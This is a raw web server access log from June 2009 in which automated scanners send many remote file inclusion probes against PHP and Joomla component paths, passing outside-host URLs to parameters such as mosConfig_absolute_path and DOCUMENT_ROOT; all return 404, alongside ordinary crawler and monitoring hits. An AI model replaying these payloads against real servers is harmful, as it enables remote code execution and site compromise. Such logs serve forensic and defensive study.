116.121.201.73 - - [28/Jun/2009:04:07:48 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.121.201.73 - - [28/Jun/2009:04:07:48 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
116.121.201.73 - - [28/Jun/2009:04:07:48 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:04:08:05 -0400] "GET /logs/error_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://aboutav.com//id2.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
83.98.209.71 - - [28/Jun/2009:04:08:05 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://aboutav.com//id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
83.98.209.71 - - [28/Jun/2009:04:08:05 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://aboutav.com//id2.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
58.227.193.198 - - [28/Jun/2009:04:08:22 -0400] "GET /logs/access_log.Q109060700%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
60.43.229.5 - - [28/Jun/2009:04:08:22 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
60.43.229.5 - - [28/Jun/2009:04:08:22 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 208 "-" "Mozilla/5.0"
60.43.229.5 - - [28/Jun/2009:04:08:22 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 213 "-" "Mozilla/5.0"
60.43.229.5 - - [28/Jun/2009:04:08:22 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:04:08:43 -0400] "GET /logs/access_log.Q109051200//admin/business_inc/saveserver.php?thisdir=http://aboutav.com//id2.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
210.115.58.73 - - [28/Jun/2009:04:08:52 -0400] "GET /logs/access_log.Q109051800//include/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.249.71.16 - - [28/Jun/2009:04:09:01 -0400] "GET /images/items/678212_full.jpg HTTP/1.1" 200 8276 "-" "Googlebot-Image/1.0"
210.115.58.73 - - [28/Jun/2009:04:09:07 -0400] "GET /logs/access_log.Q109051300//include/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.249.71.16 - - [28/Jun/2009:04:09:20 -0400] "GET /logs/error_log.Q107100100 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
125.131.116.12 - - [28/Jun/2009:04:09:30 -0400] "GET /logs/error_log.Q109051300%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 291 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:04:09:47 -0400] "GET /logs/error_log.Q109051300%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 291 "-" "libwww-perl/5.79"
217.147.29.190 - - [28/Jun/2009:04:10:37 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=2&GLOBALS=&mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:04:10:37 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=2&GLOBALS=&mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:04:10:37 -0400] "GET /logs/access_log.Q109050800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=2&GLOBALS=&mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:04:10:42 -0400] "GET /logs/access_log.Q109061100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=2&GLOBALS=&mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.30.142.179 - - [28/Jun/2009:04:10:43 -0400] "GET /logs/error_log.Q108121000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
116.121.201.73 - - [28/Jun/2009:04:10:45 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.121.201.73 - - [28/Jun/2009:04:10:46 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:04:11:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
86.109.166.161 - - [28/Jun/2009:04:11:20 -0400] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:04:11:20 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:04:11:20 -0400] "GET /logs/access_log.Q109053000/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:04:11:21 -0400] "GET /logs/access_log.Q109051900/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.820"
77.232.68.137 - - [28/Jun/2009:04:12:18 -0400] "GET /logs/access_log.Q109051200//?path%5Bdocroot%5D=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
77.232.68.137 - - [28/Jun/2009:04:12:18 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
60.43.229.5 - - [28/Jun/2009:04:12:20 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 237 "-" "Mozilla/5.0"
60.43.229.5 - - [28/Jun/2009:04:12:21 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 237 "-" "Mozilla/5.0"
218.234.21.178 - - [28/Jun/2009:04:12:23 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
193.243.139.4 - - [28/Jun/2009:04:12:44 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:04:12:44 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:04:12:44 -0400] "GET /logs/access_log.Q109061400%20%20/joomla/index.php?option=com_restaurante&task=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
211.202.2.220 - - [28/Jun/2009:04:12:54 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.kcorea.co.kr:8080/~kcorea/lib/v.jpg??%0D? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
211.202.2.220 - - [28/Jun/2009:04:12:54 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.kcorea.co.kr:8080/~kcorea/lib/v.jpg??%0D? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
211.202.2.220 - - [28/Jun/2009:04:12:54 -0400] "GET /logs/error_log.Q109060700//bemarket/postscript/postscript.php?p_mode=http://www.kcorea.co.kr:8080/~kcorea/lib/v.jpg??%0D? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
193.243.139.4 - - [28/Jun/2009:04:12:59 -0400] "GET /logs/access_log.Q109061400/joomla/index.php?option=com_restaurante&task=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
218.234.21.178 - - [28/Jun/2009:04:13:04 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
116.121.201.73 - - [28/Jun/2009:04:13:28 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.121.201.73 - - [28/Jun/2009:04:13:28 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.138.156.3 - - [28/Jun/2009:04:13:35 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
124.138.156.3 - - [28/Jun/2009:04:13:35 -0400] "GET /logs/error_log.Q109052500//modules/4nAlbum/public/displayCategory.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
124.138.156.3 - - [28/Jun/2009:04:13:35 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
124.138.156.3 - - [28/Jun/2009:04:13:39 -0400] "GET /logs/error_log.Q109052600//modules/4nAlbum/public/displayCategory.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.202.2.220 - - [28/Jun/2009:04:14:02 -0400] "GET /logs/access_log.Q109060700//bemarket/postscript/postscript.php?p_mode=http://www.kcorea.co.kr:8080/~kcorea/lib/v.jpg??%0D? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
72.30.142.179 - - [28/Jun/2009:04:15:45 -0400] "GET /logs/error_log.Q109061900 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [28/Jun/2009:04:16:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
86.109.166.161 - - [28/Jun/2009:04:18:32 -0400] "GET /logs/access_log.Q109053000/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:04:18:32 -0400] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:04:18:33 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:04:18:33 -0400] "GET /logs/access_log.Q109051900/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.820"
69.94.125.100 - - [28/Jun/2009:04:20:06 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.94.125.100 - - [28/Jun/2009:04:20:06 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.94.125.100 - - [28/Jun/2009:04:20:06 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.150.78.245 - - [28/Jun/2009:04:20:27 -0400] "GET /logs/access_log.Q109050800/modules/My_eGallery/index.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:04:21:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.131.116.12 - - [28/Jun/2009:04:21:11 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:04:21:11 -0400] "GET /logs/access_log.Q109051700//components/com_flyspray/startdown.php?file=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:04:21:12 -0400] "GET //components/com_flyspray/startdown.php?file=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
69.94.125.100 - - [28/Jun/2009:04:21:19 -0400] "GET /logs/access_log.Q109050900%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
66.249.71.204 - - [28/Jun/2009:04:21:24 -0400] "GET /logs/error_log.Q109021600 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.140.23.192 - - [28/Jun/2009:04:21:25 -0400] "GET /logs/error_log.Q109052500//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 285 "-" "libwww-perl/5.803"
62.140.23.192 - - [28/Jun/2009:04:21:25 -0400] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 264 "-" "libwww-perl/5.803"
62.140.23.192 - - [28/Jun/2009:04:21:30 -0400] "GET //administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
125.131.116.12 - - [28/Jun/2009:04:21:30 -0400] "GET //components/com_flyspray/startdown.php?file=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:04:21:31 -0400] "GET /logs/access_log.Q109051700//components/com_flyspray/startdown.php?file=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:04:21:31 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
62.140.23.192 - - [28/Jun/2009:04:21:36 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 286 "-" "libwww-perl/5.803"
125.131.116.12 - - [28/Jun/2009:04:21:43 -0400] "GET /logs/access_log.Q109052600//components/com_flyspray/startdown.php?file=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:04:21:46 -0400] "GET /logs/access_log.Q109052600//components/com_flyspray/startdown.php?file=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
69.94.125.100 - - [28/Jun/2009:04:21:54 -0400] "GET /logs/access_log.Q109060500%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:04:21:56 -0400] "GET /logs/access_log.Q109053100/joomla/index.php?option=com_restaurante&task=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
124.0.103.194 - - [28/Jun/2009:04:22:54 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
124.0.103.194 - - [28/Jun/2009:04:22:54 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
86.109.166.161 - - [28/Jun/2009:04:23:42 -0400] "GET /logs/access_log.Q109061100%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:04:24:05 -0400] "GET /logs/access_log.Q109061100%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820"
209.59.12.99 - - [28/Jun/2009:04:26:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.94.125.100 - - [28/Jun/2009:04:26:57 -0400] "GET /logs/access_log.Q109060500/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
69.94.125.100 - - [28/Jun/2009:04:29:43 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
69.94.125.100 - - [28/Jun/2009:04:29:43 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
69.94.125.100 - - [28/Jun/2009:04:29:43 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:04:31:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.94.125.100 - - [28/Jun/2009:04:31:15 -0400] "GET /logs/access_log.Q109050900%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
69.94.125.100 - - [28/Jun/2009:04:31:49 -0400] "GET /logs/access_log.Q109060500%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:04:31:51 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:04:31:51 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:04:31:51 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
66.249.71.204 - - [28/Jun/2009:04:33:24 -0400] "GET /logs/access_log.Q108033000 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.23.158.226 - - [28/Jun/2009:04:33:46 -0400] "GET /errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
65.23.158.226 - - [28/Jun/2009:04:33:46 -0400] "GET /logs/access_log.Q109060300/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
65.23.158.226 - - [28/Jun/2009:04:33:46 -0400] "GET /logs/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
65.23.158.226 - - [28/Jun/2009:04:35:44 -0400] "GET /logs/error_log.Q109060300/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
65.23.158.226 - - [28/Jun/2009:04:35:46 -0400] "GET /logs/access_log.Q109060300/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
65.23.158.226 - - [28/Jun/2009:04:35:46 -0400] "GET /errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
65.23.158.226 - - [28/Jun/2009:04:35:46 -0400] "GET /logs/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
209.59.12.99 - - [28/Jun/2009:04:36:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.94.125.100 - - [28/Jun/2009:04:36:25 -0400] "GET /logs/access_log.Q109060500/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
69.94.125.100 - - [28/Jun/2009:04:36:43 -0400] "GET /logs/access_log.Q109061500/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jun/2009:04:37:28 -0400] "GET /logs/error_log.Q109060300/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
218.234.21.178 - - [28/Jun/2009:04:38:57 -0400] "GET /logs/access_log.Q109060300/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.234.21.178 - - [28/Jun/2009:04:38:57 -0400] "GET /logs/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.234.21.178 - - [28/Jun/2009:04:38:57 -0400] "GET /errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.234.21.178 - - [28/Jun/2009:04:39:06 -0400] "GET /logs/access_log.Q109060300/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.234.21.178 - - [28/Jun/2009:04:39:06 -0400] "GET /errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.234.21.178 - - [28/Jun/2009:04:39:06 -0400] "GET /logs/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
66.249.71.16 - - [28/Jun/2009:04:39:30 -0400] "GET /images/items/682430_full.jpg HTTP/1.1" 200 5154 "-" "Googlebot-Image/1.0"
209.59.12.99 - - [28/Jun/2009:04:41:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.234.21.178 - - [28/Jun/2009:04:41:18 -0400] "GET /logs/error_log.Q109060300/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.234.21.178 - - [28/Jun/2009:04:41:18 -0400] "GET /logs/error_log.Q109060300/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
124.138.156.3 - - [28/Jun/2009:04:44:31 -0400] "GET /errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
124.138.156.3 - - [28/Jun/2009:04:44:31 -0400] "GET /logs/access_log.Q109061700/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.138.156.3 - - [28/Jun/2009:04:44:31 -0400] "GET /logs/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
